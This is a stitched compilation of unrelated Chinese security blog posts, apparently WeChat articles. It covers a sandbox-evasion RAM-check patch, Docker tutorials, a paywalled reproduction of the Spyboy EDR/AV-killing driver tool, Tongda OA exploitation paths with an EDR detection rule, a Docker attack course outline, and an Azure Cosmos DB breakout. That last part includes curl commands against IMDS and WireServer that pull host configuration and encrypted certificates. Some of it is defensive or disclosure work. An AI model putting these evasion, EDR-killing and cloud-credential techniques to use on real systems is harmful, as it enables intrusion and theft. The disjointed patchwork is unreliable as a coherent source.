沙箱通常用于分析恶意软件。它们提供了一个临时、隔离且安全的环境，用于观察可疑文件是否表现出任何恶意行为。然而，恶意软件开发人员也开发了逃避沙箱和分析环境的方法。一种方法是通过检查来确定恶意软件运行的机器是不是由真人操作。其中一项检查是 RAM 大小。如果 RAM 大小小得不切实际（例如 1GB），则可能表明该机器是沙盒。如果恶意软件检测到沙箱，它不会执行其真正的恶意行为，并且可能看起来是一个良性文件。

细节

• GetPhysicallyInstalledSystemMemory

  API 从

  SMBIOS

  固件表中获取计算机的物理内存量。它传入一个

  PULONGLONG

  参数并在函数成功时返回

  TRUE

  ，将

  TotalMemoryInKilobytes

  设置为非零值。如果函数失败，则返回

  FALSE

  
• 从

  GetPhysicallyInstalledSystemMemory

  函数获取的物理内存量必须等于或大于

  GlobalMemoryStatusEx

  函数报告的量；如果小于，则

  SMBIOS

  数据格式错误且函数失败并显示

  ERROR_INVALID_DATA

  ，格式错误的 SMBIOS 数据可能表明用户计算机存在问题。

• 寄存器

  rcx

  保存参数

  TotalMemoryInKilobytes

  。为了修改

  GetPhysicallyInstalledSystemMemory

  的跳转地址，我使用了以下操作码：

  mov qword ptr ss:[rcx],4193B840

  。这会将值

  4193B840

  （或 1.1 TB）移动到

  rcx

  。然后，

  ret

  指令用于从堆栈弹出返回地址并跳转到它，因此，无论何时调用

  GetPhysicallyInstalledSystemMemory

  ，它都会将

  rcx

  设置为自定义值。

使用教程的视频

工具代码链接获取方式，打赏后，自动返回代码链接

请点一下右下角的“在看”，谢谢！！

请帮忙点赞， 谢谢！！

请帮忙转发，谢谢！！

暗号: 648919

• 冗长的方法使用

  Docker

  拉取镜像，然后一个一个地部署，
• 使用

  docker-compose

  ，简单的一个文件并一次性部署容器。

使用 Docker CLI 执行部署

在系统上，当前没有拉取镜像。要检查这些镜像的名称，可以从注册表中调用目录 API。

docker pull registry:5000/appserverdocker pull registry:5000/memcached-app

注意：只有一个标签可用于这些镜像（

latest

），可以在编写拉取镜像命令时忽略它，因为默认情况下

docker

使用

latest

标签。

为容器之间的路由请求创建网络命名空间

创建使用app-test网络路由的容器

docker run --network app-test -d registry:5000/appserverdocker run --network app-test -d registry:5000/memcached-app

通过 IP地址 与 容器交互

现在可以验证端口 80 是否开放 IP 地址并通过 curl 执行 HTTP 请求。

停止包含并销毁资源

完成工作后，建议停止容器为系统上的其他进程或容器运行提供空间。在现实世界中，只有当在服务器上滚动更新并希望关闭旧的运行代码服务时，才会这样做。

使用 Docker Compose 执行部署

概述

使用

docker-compose

1. yaml

   文件的简单格式来配置资源和服务（容器）

2. 一个文件来管理特定项目的所有容器

3. 与

   docker

   不同，执行启动、停止操作和扩展容器非常容易。此外，可以轻松创建或销毁资源

4. 默认情况下为当前应用程序上下文创建网桥以提供网络级隔离

5. 允许开发人员使用配置即时构建容器

为两个服务编写配置

version: "3.3"services:  memcached:    image: registry:5000/memcached-app    depends_on:      - app  app:    image: registry:5000/appserver    ports:      - "8080:80"  # mapping the port 80 of container with 8080 on the host (both ipv4 and ipv6)

启动服务并访问appserver

停止服务并销毁所有资源

注意：

docker destroy

命令会先停止容器并释放所有占用的资源。

请点一下右下角的“在看”，谢谢！！

请帮忙点赞， 谢谢！！

请帮忙转发，谢谢！！

暗号: 177194

简介

• 重现

  Spyboy

  技术，涉及通过使用

  zam64.sys

  驱动程序终止所有

  EDR/XDR/AVs

  进程

• Spyboy以3,000美元的价格出售最终结者软件

• 样本来自loldrivers, https://www.loldrivers.io/drivers/49920621-75d5-40fc-98b0-44f8fa486dcc/

使用方法

1. 下载发布版本。 请通过打赏获取代码地址

2. 将驱动程序

   Terminator.sys

   放于与可执行文件同一目录

3. 以管理人员身份运行程序

4. 让程序一直运行, 防止服务重新启动反恶意软件

技术细节

请点一下右下角的“在看”，谢谢！！

请帮忙点赞， 谢谢！！

请帮忙转发，谢谢！！

暗号: 884298

在这篇文章中，将从信息安全的角度讨论所需的容器基础知识。

容器化与虚拟化

与 Docker 交互

usermod -aG docker $USERnewgrp docker

sudo systemctl restart docker.service

拉取镜像和创建容器

使用 Docker命令行和 TCP socket

- ExecStart=/usr/bin/dockerd -H fd://+ ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375

使用 Curl 和 Docker HTTP API

由于已经拉取了镜像，将使用相同的镜像。所以首先让列出镜像和容器。列出容器和镜像的端点——List Containers 和 List Images

重用容器名称 flaskapp，但该名称已被使用并且容器正在运行。要重用容器的旧名称，需要停止并删除容器

现在您需要创建容器，然后通过创建容器端点的响应中的 ID 启动它。

现在您可以使用 curl 从 localhost 上的 pot 1337 命中容器请求。

特权容器与普通容器

当深入研究 CLI 选项或容器架构时，会出现特权容器的概念。在本节中，将详细了解特权容器以及如何

在正常情况下，看到隔离是在操作系统级别完成的，这是由运行时引擎管理的。它充当操作系统和容器之间的桥梁，将系统调用传递给内核并有效地使用主机资源。

请点一下右下角的“在看”，谢谢！！

暗号：150798

前言

假设你是网络安全建设或防御负责人，相信针对通达 OA 的渗透测试一定是使你提心吊胆、夜不能寐且辗转反侧的原因之一。

在此篇文章中，我们将给出可以遏制针对通达 OA 进行漏洞利用的策略，及时发现并降低它可能给终端安全带来的风险。

关于通达 OA

通达 OA（Office Anywhere），是一款适用于企事业单位的通用型网络办公软件，是北京通达信科科技有限公司旗下产品之一。

北京通达信科科技有限公司隶属于中国兵器工业信息中心，简称通达信科。是一支以协同管理软件研发与实施、服务与咨询为主营业务的高科技团队，是国内协同管理软件行业里一家央企单位，中国协同管理软件的领军企业。

漏洞公开情况

为了更好了解产品的自身安全问题，通过对百度搜索信息的公开检索，我们调查了自 2020 年 1 月到 2023 年 6 月，有关通达 OA 的全部漏洞公开情况：

• 2020 年 3 月

1. 未授权文件上传漏洞

2. 未授权文件包含漏洞

• 2020 年 4 月

1. 未授权任意用户伪造漏洞（CNVD-2020-25050）

• 2020 年 8 月

1. 未授权 SQL 注入漏洞

2. 未授权任意文件删除漏洞（CNVD-2021-14827）

• 2020 年 9 月

1. 后台任意文件上传漏洞（CNVD-2020-57815）

2. 后台 SQL 注入漏洞

• 2021 年 3 月

1. 任意在线用户登录凭据窃取漏洞

• 2021 年 7 月

1. 后台 SSRF 漏洞

• 2022 年 2 月

1. 后台 SQL 注入漏洞

• 2022 年 4 月

1. 未授权任意文件上传漏洞

• 2022 年 7 月

1. 未授权任意文件上传漏洞

2. 后台任意文件上传漏洞

• 2022 年 11 月

1. 任意文件上传漏洞

上述 14 个漏洞均允许攻击者完全的控制受影响目标系统，全部为高危漏洞，影响范围极大。

利用方式分析

通达 OA 安装时，会以 SYSTEM 权限向宿主系统部署并启动以下主要组件：

• MySQL：提供数据存储功能

• Redis：提供缓存功能

• Nginx：提供网站功能

• PHP-CGI：提供 PHP 代码执行功能

主要组件运行关系如下：

结合历史漏洞类型和组件运行关系，我们总结的攻击者通用操作如下：

1. 如果可以进行未授权的文件上传，且上传后的文件扩展名可控，则直接部署 PHP WebShell。

2. 如果可以进行未授权的文件上传，但后缀名被限制且无法绕过，则上传带有后门 PHP 代码的图片或其他文件。

3. 如果可以进行未授权的文件包含（include），则包含带有后门 PHP 代码的图片或其他文件（如日志文件），继而部署 PHP WebShell。

4. 如果可以进行未授权的 SQL 注入漏洞利用，则利用 MySQL 在网站目录中部署 PHP WebShell 或执行系统命令。

5. 如果可以得到认证后相关 API 的调用权限（登陆后），则利用登陆后相关漏洞。

6. 如果存在后台 SQL 漏洞，利用方式参考 4。

7. 如果存在后台文件上传类漏洞，利用方式参考 1、2、3。

8. 如果后台存在 SSRF 漏洞，则利用 redis 在网站目录中部署 PHP WebShell。

由于通达 OA 的主要组件默认以 SYSTEM 权限运行，所以，攻击者在获得 PHP 任意代码执行的方式（如 WebShell）后，目标系统就已经完全沦陷，攻击者可能以 SYSTEM 权限进行任何后续操作，包括但不限于系统命令执行、可疑二进制文件上传/运行、窃取系统敏感凭据、部署勒索病毒、搭建机密网络隧道和任何针对内部网络的恶意活动。

不要过于担心，虽然这些漏洞利用和后续操作看起来很可怕，但它们产生的系统行为特征非常明显，我们可以把所有相关行为抽象成以下几种：

1. 写入 PHP 脚本文件

2. 写入可执行文件

3. 执行了常用黑客命令

4. 产生了不寻常的网络连接

相关进程包括：php-cgi.exe、mysqld.exe 和 redis-server64.exe。

这些行为看起来似乎与通达 OA 产品没有任何关系，因为它们完全是通用的渗透测试行为。

检测与防御

通过复杂之眼 EDR 提供的 MEQL 语法，根据上述行为，我们编写了以下示例策略：

(EventType IN ("File Data Write", "File Data Modification") ANDFileExt IN ("php", "php5", "phtml")OREventType = "Network Establish" AND NetworkFlow = "OUT" ANDNetworkRemotePort IN ("445", "135", "139", "3389", "22", "88")) ANDProcessName IN ("php-cgi.exe", "mysqld.exe", "redis-server64.exe")OREventType = "Process Creation" AND(ProcessName IN ("cmd.exe", "powershell.exe", "pwsh.exe") ORProcessName IN ("whoami.exe", "systeminfo.exe", "ipconfig.exe","netstat.exe", "certutil.exe")) ANDProcessParentName IN ("php-cgi.exe", "mysqld.exe", "redis-server64.exe")

为了证实策略的有效性，我们在一台 Windows Server 2019 服务器上部署了通达 OA V11.2 与复杂之眼 EDR 客户端。

部署完成后，使用上述提到的 2020 年 4 月公开的漏洞，模拟攻击者对这个服务器系统进行渗透测试。

1. 使用公开的利用程序一键上传 PHP WebShell

2. 通过 PHP WebShell 执行系统命令，如 ipconfig 和 whoami 等。

从漏洞利用的结果来看，名为 test.php 的 PHP WebShell 被成功部署，但没有命令的执行结果，表明系统命令并没有成功执行，这似乎对渗透测试人员来说不是一个好迹象。

回到复杂之眼 EDR 后台，我们可以观察到目标系统产生了警报，并向安全人员发送了邮件提醒。

• 安全警报邮件

• 检测仪表盘

• 威胁细节

• 事件猎手 通过前面制定的策略，我们还发现了 PHP WebShell 部署的关键数字证据。

我们并没有针对通达 OA 进行特定的策略指定，而这场游戏却已经结束了。

OA 市场未来会出现新的高危零日漏洞吗？它们可以逃避下一场由我们主导的猎杀游戏吗？

关于复杂之眼

复杂之眼端点检测与响应系统（MultiEye EDR），依托领先的终端安全大数据技术，实现了与传统安全行业完全不同的，基于云的终端安全服务（SaaS EDR），并开展基于云的托管安全服务（MDR），快速地揭露潜藏在客户网络深处的恶意活动者，可以向客户提供网络安全高级威胁狩猎（APT Hunter）、快速应急响应、调查取证与高级别的网络安全咨询服务。

我们可以发现并挫败一切网络攻击，保护您的网络安全。

立刻申请试用：https://www.mistiny.com/index.php/trial-submit/

请点一下右下角的“在看”，谢谢！！

请帮忙点赞， 谢谢！！

请帮忙转发，谢谢！！

暗号: 318658

必备知识

• Linux

  提权系列<请见本公众号发的>

• Docker

  基础知识（可选）

• DevOps

  系统黑客 –

  LiveOverflow（可选）

• 面向初学者的

  Docker

  –

  TechWorld with Nana

  （可选）

要求

• Pentester

  学院到实践实验室的帐户（可选）
• 现代浏览器（推荐

  Chrome

  ）

话题

Docker 生态系统入门

• 了解容器架构

• 亲自动手设置多容器架构

• Docker

   容器底层原理？

• Docker

  资源管理详解
• 为什么

  Pivot Root

  用于容器？

• 从头开始创建您自己的基础镜像

了解设置中的错误配置并加以利用

• 利用在

  Docker

  中运行的微服务
• 分析

  Docker

  镜像来获取密钥
• 利用不安全的

  Docker

  注册表
• 通过分析

  Docker

  镜像从容器中寻找密钥
• 与受保护的

  Docker

  注册表交互
• 破坏源

  Docker

  镜像

• 容器环境突破（第 1 部分和第 2 部分）

• 攻击

  Docker

  守护进程服务（第 1 部分和第 2 部分）
• 从 不受

  Seccomp

  约束的容器中突破

• 利用绑定挂载的安全检查

• 通过滥用

  REST API

  绕过

  Docker

  防火墙插件

保护您的 Docker 环境

• 使用

  AppArmor

  保护

  Docker

  环境

• 在运行的容器中寻找恶意二进制文件

• 通过

  Linters

  识别和修复

  Dockerfile

  中的错误配置
• 使用

  Clair

  识别

  Docker

  镜像中的已知漏洞

• Docker

  容器的

  Seccomp

  基础知识
• 使用密码和

  TLS

  证书保护

  Docker

  注册表
• 使用

  Docker

  引擎

  API

  实施

  TLS

  证书
• 使用

  Dockscan

  识别

  Docker

  设置中的问题
• 通过

  UserNS

  重映射防止容器突破导致的特权升级
• 观察使用

  Falco

  检测到的恶意行为

1. 在

   Azure Cosmos DB

   上设置

   Jupyter Notebook

   容器
2. 运行任意

   C#

   代码获取

   root

   权限

3. 删除在容器本地设置的防火墙规则以获得不受限制的网络访问

4. 查询

   WireServer

   以获取有关已安装的扩展、证书及其对应私钥的信息
5. 连接本地

   Service Fabric

   ，列出所有正在运行的应用程序，获取其他客户数据库的主密钥
6. 通过

   Internet

   访问多个区域的

   Service Fabric

   实例

揭开基础知识——什么是 Azure Cosmos DB？

据 微软称：

Azure Cosmos DB

是一个用于现代应用程序开发的完全托管

NoSQL

数据库。毫秒级响应时间，具有自动和即时的可扩展性，保证在任何规模的速度。业务连续性通过

SLA

支持的可用性和企业级安全性得到保证。

什么是 Jupyter

notebook

？

错误 #1：Jupyter Notebook 本地权限提升 (LPE)

是的，我们也很惊讶。

错误 #2：不受限制的网络访问

1. 169.254.169.254,

   IMDS

   元数据服务

2. 10.0.0.0/16 子网，一个我们不熟悉的内部子网

3. 168.63.129.16, 另一个陌生的 IP 地址

需要指出的是，在我们看来，执行这些防火墙规则的更安全方法是在

Jupyter Notebook

容器之外，黑客即使拥有

root

权限也无法绕过它们。

错误 #3：不是我们应得的证书，而是我们需要的证书

访问禁止的 IP 地址 #1 – IMDS

1. 我们的

   Azure

   环境设置为

   AzurePublicCloud

   ，我们的订阅

   ID

   不是我们拥有的订阅。
2. 我们

   osType

   设置为

   Windows

   ，即使我们在

   Linux

   终端上运行

   Linux

   命令。
3. 我们在

   10.0.0.0/16

   子网中有一个 IP 地址——根据我们刚刚删除的防火墙规则，我们不应该访问同一个子网。

把这些放在一起，我们意识到我们不是在查询我们容器的元数据服务，而是我们的宿主机的元数据服务，它似乎托管在某种共享环境 中！

root@notebook:/home/cosmosuser# curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance?api-version=2021-02-01" | jq {  "compute": {    "azEnvironment": "AzurePublicCloud",    "customData": "",    "evictionPolicy": "",    "isHostCompatibilityLayerVm": "false",    "licenseType": "",    "location": "eastus",    "name": "CV2CW02_3",    "offer": "WindowsServer",    "osProfile": {      "adminUsername": "cosmosadmin",      "computerName": "CV2CW02000003",      "disablePasswordAuthentication": ""    },    "osType": "Windows",    "placementGroupId": "[REDACTED]",    "plan": {      "name": "",      "product": "",      "publisher": ""    },    "platformFaultDomain": "3",    "platformUpdateDomain": "3",    "priority": "",    "provider": "Microsoft.Compute",    "publicKeys": [],    "publisher": "MicrosoftWindowsServer",    "resourceGroupName": "eastus-cdb-ms-prod-eastus1-cs1",    "resourceId": "/subscriptions/[REDACTED]/resourceGroups/eastus-cdb-ms-prod-eastus1-cs1/providers/Microsoft.Compute/virtualMachineScaleSets/CV2CW02/virtualMachines/3",    "securityProfile": {      "secureBootEnabled": "false",      "virtualTpmEnabled": "false"    },    "sku": "datacenter-core-2004-with-containers-smalldisk",    "storageProfile": {      "dataDisks": [        {          "caching": "None",          "createOption": "Empty",          "diskSizeGB": "128",          "image": {            "uri": ""          },          "lun": "0",          "managedDisk": {            "id": "/subscriptions/[REDACTED]/resourceGroups/EASTUS-CDB-MS-PROD-EASTUS1-CS1/providers/Microsoft.Compute/disks/CV2CW02_CV2CW02_3_disk2_[REDACTED]",            "storageAccountType": "Premium_LRS"          },          "name": "CV2CW02_CV2CW02_3_disk2_[REDACTED]",          "vhd": {            "uri": ""          },          "writeAcceleratorEnabled": "false"        }      ],      "imageReference": {        "id": "",        "offer": "WindowsServer",        "publisher": "MicrosoftWindowsServer",        "sku": "datacenter-core-2004-with-containers-smalldisk",        "version": "19041.985.2105050408"      },      "osDisk": {        "caching": "ReadOnly",        "createOption": "FromImage",        "diffDiskSettings": {          "option": ""        },        "diskSizeGB": "30",        "encryptionSettings": {          "enabled": "false"        },        "image": {          "uri": ""        },        "managedDisk": {          "id": "/subscriptions/[REDACTED]/resourceGroups/eastus-cdb-ms-prod-eastus1-cs1/providers/Microsoft.Compute/disks/CV2CW02_CV2CW02_3_OsDisk_1_[REDACTED]",          "storageAccountType": "Premium_LRS"        },        "name": "CV2CW02_CV2CW02_3_OsDisk_1_[REDACTED]",        "osType": "Windows",        "vhd": {          "uri": ""        },        "writeAcceleratorEnabled": "false"      },      "resourceDisk": {        "size": "4096000"      }    },    "subscriptionId": "[REDACTED]",    "tags": "federationName:cdb-ms-prod-eastus1-cs1;platformsettings.host_environment.service.platform_optedin_for_rootcerts:true",    "tagsList": [      {        "name": "federationName",        "value": "cdb-ms-prod-eastus1-cs1"      },      {        "name": "platformsettings.host_environment.service.platform_optedin_for_rootcerts",        "value": "true"      }    ],    "userData": "",    "version": "19041.985.2105050408",    "vmId": "[REDACTED]",    "vmScaleSetName": "CV2CW02",    "vmSize": "SQLG5_NP80s",    "zone": ""  },  "network": {    "interface": [      {        "ipv4": {          "ipAddress": [            {              "privateIpAddress": "10.0.1.60",              "publicIpAddress": ""            }          ],          "subnet": [            {              "address": "10.0.1.0",              "prefix": "24"            }          ]        },        "ipv6": {          "ipAddress": []        },        "macAddress": "[REDACTED]"      }    ]  }

访问禁止的 IP 地址 #3 – WireServer

了解 WireServer

查询目标状态

root@notebook:/home/cosmosuser# curl -s "http://168.63.129.16:80/machine/?comp=goalstate" -H "x-ms-agent-name: WALinuxAgent" -H "x-ms-version: 2012-11-30"<?xml version="1.0" encoding="utf-8"?><GoalState xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="goalstate10.xsd">  <Version>2012-11-30</Version>  <Incarnation>19</Incarnation>  <Machine>    <ExpectedState>Started</ExpectedState>    <StopRolesDeadlineHint>300000</StopRolesDeadlineHint>    <LBProbePorts>      <Port>16001</Port>    </LBProbePorts>    <ExpectHealthReport>FALSE</ExpectHealthReport>  </Machine>  <Container>    <ContainerId>82daf2f0-1c7a-45e5-9be6-<REDACTED></ContainerId>    <RoleInstanceList>      <RoleInstance>        <InstanceId>f2a6f11f-ad20-4bb3-839f-<REDACTED>._CV2FI02_0</InstanceId>        <State>Started</State>        <Configuration>          <HostingEnvironmentConfig>http://168.63.129.16:80/machine/82daf2f0-1c7a-45e5-9be6-<REDACTED>/f2a6f11f%2Dad20%2D4bb3%2D839f%<REDACTED>.%5FCV2FI02%5F0?comp=config&amp;type=hostingEnvironmentConfig&amp;incarnation=19</HostingEnvironmentConfig>          <SharedConfig>http://168.63.129.16:80/machine/82daf2f0-1c7a-45e5-9be6-<REDACTED>/f2a6f11f%2Dad20%2D4bb3%2D839f%<REDACTED>.%5FCV2FI02%5F0?comp=config&amp;type=sharedConfig&amp;incarnation=19</SharedConfig>          <ExtensionsConfig>http://168.63.129.16:80/machine/82daf2f0-1c7a-45e5-9be6-<REDACTED>/f2a6f11f%2Dad20%2D4bb3%2D839f%<REDACTED>.%5FCV2FI02%5F0?comp=config&amp;type=extensionsConfig&amp;incarnation=19</ExtensionsConfig>          <FullConfig>http://168.63.129.16:80/machine/82daf2f0-1c7a-45e5-9be6-<REDACTED>/f2a6f11f%2Dad20%2D4bb3%2D839f%<REDACTED>.%5FCV2FI02%5F0?comp=config&amp;type=fullConfig&amp;incarnation=19</FullConfig>          <Certificates>http://168.63.129.16:80/machine/82daf2f0-1c7a-45e5-9be6-<REDACTED>/f2a6f11f%2Dad20%2D4bb3%2D839f%<REDACTED>.%5FCV2FI02%5F0?comp=certificates&amp;incarnation=19</Certificates>          <ConfigName>f2a6f11f-ad20-4bb3-839f-<REDACTED>.20.f2a6f11f-ad20-4bb3-839f-<REDACTED>.20._CV2FI02_0.1.xml</ConfigName>        </Configuration>        <ServiceManagementInfo>          <SupportedVersions>http://168.63.129.16:80/ServiceManagement/?comp=versions</SupportedVersions>          <ManagementInfo>http://168.63.129.16:80/ServiceManagement/82daf2f0-1c7a-45e5-9be6-<REDACTED>/f2a6f11f%2Dad20%2D4bb3%2D839f%<REDACTED>.%5FCV2FI02%5F0?comp=ManagementInfo</ManagementInfo>        </ServiceManagementInfo>      </RoleInstance>    </RoleInstanceList>  </Container>

获取扩展配置

root@notebook:/home/cosmosuser# curl -s "http://168.63.129.16:80/machine/82daf2f0-1c7a-45e5-9be6-<REDACTED>/f2a6f11f-ad20-4bb3-839f-<REDACTED>._CV2FI02_0?comp=config&type=extensionsConfig&incarnation=19" -H "x-ms-agent-name: WALinuxAgent" -H "x-ms-version: 2012-11-30"<?xml version="1.0" encoding="utf-8"?><Extensions version="1.0.0.0" goalStateIncarnation="19"><GuestAgentExtension xmlns:i="http://www.w3.org/2001/XMLSchema-instance">  <GAFamilies>    <GAFamily>      <Name>Win7</Name>    </GAFamily>    <GAFamily>      <Name>Win8</Name>      <Uris>        <Uri>https://zrd<REDACTED>02.blob.core.windows.net/bfd5c281a7dc4<REDACTED>/Microsoft.WindowsAzure.GuestAgent_CRPProd_uswest_manifest.xml</Uri>        <Uri>https://zrd<REDACTED>07.blob.core.windows.net/bfd5c281a7dc4<REDACTED>/Microsoft.WindowsAzure.GuestAgent_CRPProd_uswest_manifest.xml</Uri>        <Uri>https://zrd<REDACTED>r01a.blob.core.windows.net/bfd5c281a7dc4<REDACTED>/Microsoft.WindowsAzure.GuestAgent_CRPProd_uswest_manifest.xml</Uri>        <Uri>https://rd<REDACTED>03.blob.core.windows.net/bfd5c281a7dc4<REDACTED>/Microsoft.WindowsAzure.GuestAgent_CRPProd_uswest_manifest.xml</Uri>        <Uri>https://zrd<REDACTED>r10a.blob.core.windows.net/bfd5c281a7dc4<REDACTED>/Microsoft.WindowsAzure.GuestAgent_CRPProd_uswest_manifest.xml</Uri>        <Uri>https://zrd<REDACTED>r05a.blob.core.windows.net/bfd5c281a7dc4<REDACTED>/Microsoft.WindowsAzure.GuestAgent_CRPProd_uswest_manifest.xml</Uri>        <Uri>https://rd<REDACTED>01.blob.core.windows.net/bfd5c281a7dc4<REDACTED>/Microsoft.WindowsAzure.GuestAgent_CRPProd_uswest_manifest.xml</Uri>        <Uri>https://rd<REDACTED>01.blob.core.windows.net/bfd5c281a7dc4<REDACTED>/Microsoft.WindowsAzure.GuestAgent_CRPProd_uswest_manifest.xml</Uri>        <Uri>https://zrd<REDACTED>05.blob.core.windows.net/bfd5c281a7dc4<REDACTED>/Microsoft.WindowsAzure.GuestAgent_CRPProd_uswest_manifest.xml</Uri>        <Uri>https://rd<REDACTED>01.blob.core.windows.net/bfd5c281a7dc4<REDACTED>/Microsoft.WindowsAzure.GuestAgent_CRPProd_uswest_manifest.xml</Uri>        <Uri>https://brd<REDACTED>04.blob.core.windows.net/bfd5c281a7dc4<REDACTED>/Microsoft.WindowsAzure.GuestAgent_CRPProd_uswest_manifest.xml</Uri>        <Uri>https://zrd<REDACTED>r09a.blob.core.windows.net/bfd5c281a7dc4<REDACTED>/Microsoft.WindowsAzure.GuestAgent_CRPProd_uswest_manifest.xml</Uri>        <Uri>https://zrd<REDACTED>03.blob.core.windows.net/bfd5c281a7dc4<REDACTED>/Microsoft.WindowsAzure.GuestAgent_CRPProd_uswest_manifest.xml</Uri>        <Uri>https://rd<REDACTED>02.blob.core.windows.net/bfd5c281a7dc4<REDACTED>/Microsoft.WindowsAzure.GuestAgent_CRPProd_uswest_manifest.xml</Uri>        <Uri>https://zrd<REDACTED>09.blob.core.windows.net/bfd5c281a7dc4<REDACTED>/Microsoft.WindowsAzure.GuestAgent_CRPProd_uswest_manifest.xml</Uri>        <Uri>https://rd<REDACTED>02.blob.core.windows.net/bfd5c281a7dc4<REDACTED>/Microsoft.WindowsAzure.GuestAgent_CRPProd_uswest_manifest.xml</Uri>        <Uri>https://zrd<REDACTED>r03a.blob.core.windows.net/bfd5c281a7dc4<REDACTED>/Microsoft.WindowsAzure.GuestAgent_CRPProd_uswest_manifest.xml</Uri>        <Uri>https://rd<REDACTED>02.blob.core.windows.net/bfd5c281a7dc4<REDACTED>/Microsoft.WindowsAzure.GuestAgent_CRPProd_uswest_manifest.xml</Uri>      </Uris>    </GAFamily>  </GAFamilies>  <Location>westus</Location>  <ServiceName>CRP</ServiceName></GuestAgentExtension><StatusUploadBlob statusBlobType="PageBlob">https://md-<REDACTED>.z13.blob.storage.azure.net/$system/CV2FI02_0.6eb0b152-261a-4bc7-89ae-<REDACTED>.status?sv=2018-03-28&amp;sr=b&amp;sk=system-1&amp;sig=MxCWbN<REDACTED>&amp;se=9999-01-01T00%3a00%3a00Z&amp;sp=w</StatusUploadBlob><Plugins>  <Plugin name="Microsoft.Azure.Security.Dsms.DsmsForWindows" version="3.20.60.1" location="https://rd<REDACTED>02.blob.core.windows.net/<REDACTED>/Microsoft.Azure.Security.Dsms_DSMSForWindows_uswest_manifest.xml" state="enabled" autoUpgrade="true" failoverlocation="https://brd<REDACTED>04.blob.core.windows.net/<REDACTED>/Microsoft.Azure.Security.Dsms_DSMSForWindows_uswest_manifest.xml" runAsStartupTask="false" isJson="true" useExactVersion="true" />  <Plugin name="Microsoft.Azure.ServiceFabric.ServiceFabricNode" version="1.1.0.12" location="https://zrd<REDACTED>07.blob.core.windows.net/<REDACTED>/Microsoft.Azure.ServiceFabric_ServiceFabricNode_uswest_manifest.xml" state="enabled" autoUpgrade="true" failoverlocation="https://rd<REDACTED>02.blob.core.windows.net/<REDACTED>/Microsoft.Azure.ServiceFabric_ServiceFabricNode_uswest_manifest.xml" runAsStartupTask="false" isJson="true" useExactVersion="true" /></Plugins><PluginSettings>  <Plugin name="Microsoft.Azure.Security.Dsms.DsmsForWindows" version="3.20.60.1">    <RuntimeSettings seqNo="2">{  "runtimeSettings": [    {      "handlerSettings": {        "protectedSettingsCertThumbprint": "85FFC66A525E9A3D45597788B076B95356296E46",        "protectedSettings": "MIIB0AYJK<REDACTED>"      }    }  ]}</RuntimeSettings>  </Plugin>  <Plugin name="Microsoft.Compute.CustomScriptExtension" version="1.10.12">    <DependsOn dependencyLevel="1">      <DependsOnExtension handler="Microsoft.Azure.Security.Dsms.DsmsForWindows" />    </DependsOn>  </Plugin>  <Plugin name="Microsoft.Azure.Geneva.GenevaMonitoring" version="2.27.0.3">    <RuntimeSettings seqNo="2">{  "runtimeSettings": [    {      "handlerSettings": {        "publicSettings": {}      }    }  ]}</RuntimeSettings>  </Plugin>  <Plugin name="Microsoft.Azure.Security.AntimalwareSignature.AntimalwareConfiguration" version="2.58.15">    <RuntimeSettings seqNo="2">{  "runtimeSettings": [    {      "handlerSettings": {        "publicSettings": {}      }    }  ]}</RuntimeSettings>  </Plugin></PluginSettings>

我们的 VM 有几个配置的扩展，包括：

1. Microsoft.Azure.Security.Dsms.DsmsForWindows

2. Microsoft.Azure.Geneva.GenevaMonitoring

3. Microsoft.Azure.Security.AntimalwareSignature.AntimalwareConfiguration

4. Microsoft.Compute.CustomScriptExtension

5. Microsoft.Azure.ServiceFabric.ServiceFabricNode

6. Microsoft.Compute.CustomScriptExtension

获取解密密钥

大多数扩展包含以下两个部分：

root@notebook:/home/cosmosuser# curl -s -H 'x-ms-agent-name: WALinuxAgent' -H 'x-ms-version: 2012-11-30' "http://168.63.129.16:80/machine/82daf2f0-1c7a-45e5-9be6-<REDACTED>/f2a6f11f-ad20-4bb3-839f-<REDACTED>._CV2FI02_0?comp=certificates&incarnation=19&type=fullConfig" -v -H 'x-ms-cipher-name: DES_EDE3_CBC' -H 'x-ms-guest-agent-public-x509-cert: MIIDDTCCAf<REDACTED>VILecKTmgDgpm9K0='*   Trying 168.63.129.16...* TCP_NODELAY set* Connected to 168.63.129.16 (168.63.129.16) port 80 (#0)> GET /machine/82daf2f0-1c7a-45e5-9be6-<REDACTED>/f2a6f11f-ad20-4bb3-839f-<REDACTED>._CV2FI02_0?comp=certificates&incarnation=19&type=fullConfig HTTP/1.1> Host: 168.63.129.16> User-Agent: curl/7.58.0> Accept: */*> x-ms-agent-name: WALinuxAgent> x-ms-version: 2012-11-30> x-ms-cipher-name: DES_EDE3_CBC> x-ms-guest-agent-public-x509-cert: MIIDDTCCAf … redacted … ILecKTmgDgpm9K0=>< HTTP/1.1 200 OK< Content-Type: text/xml; charset=utf-8< Server: Microsoft-IIS/10.0< Date: Mon, 09 Aug 2021 15:14:13 GMT< Content-Length: 218769<{ [14133 bytes data]* Connection #0 to host 168.63.129.16 left intact<?xml version="1.0" encoding="utf-8"?><CertificateFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="certificates10.xsd">  <Version>2012-11-30</Version>  <Incarnation>19</Incarnation>  <Format>CertificatesBondPackage</Format>  <Data>Cw7XFjCCC1MGCSqGSIb3DQEHA6CCC0QwggtAAgECMYIBMDCCASwCAQKAFHLFPtEzNkHq9EbPS1vv8Xh+51+XMA0GCSqGSIb3DQEBAQUABIIBADsYzJwqOmvP154ZphyM... redacted ...RCwBXbsdtTLSR9I4LtD+gdwyah617jzV/OeBHRnDJELqYzmpUgRSAG8AbwB0AAAA</Data></CertificateFile>

这是我们第一次遇到这种格式。不幸的是，我们用来执行解密标准格式的 OpenSSL 命令在这里不起作用。是时候启动我们的游戏并尝试解码这种格式了！

解码证书绑定包

